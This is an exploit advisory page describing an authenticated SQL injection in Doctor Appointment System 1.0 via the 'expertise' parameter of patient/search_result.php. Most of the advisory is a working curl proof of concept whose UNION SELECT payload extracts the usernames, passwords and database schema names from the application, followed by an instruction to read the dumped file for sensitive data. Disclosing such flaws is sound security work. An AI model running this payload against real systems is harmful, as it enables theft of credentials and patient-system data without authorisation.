Doctor Appointment System 1.0 SQL Injection

2021.02.09
Credit: Nakul Ratti
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection # Date: 2021-02-09 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Version: V1.0 Vulnerable File: ---------------- http://host/patient/search_result.php Vulnerable Issue: ----------------- Expertise parameter has no input validation POC: ---- 1] Login as a normal patient user 2] Insert cookie after successful login in the below command: curl -i -s -o tmp -k -X $'POST' \ -H $'Host: 192.168.1.12' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 288' -H $'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \ --data-binary $'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'<br>\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit=' \ $'http://host/patient/search_result.php' 3] Check the tmp file for sensitive information from the database. ------------------ Kindly let us know if any other information is required.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top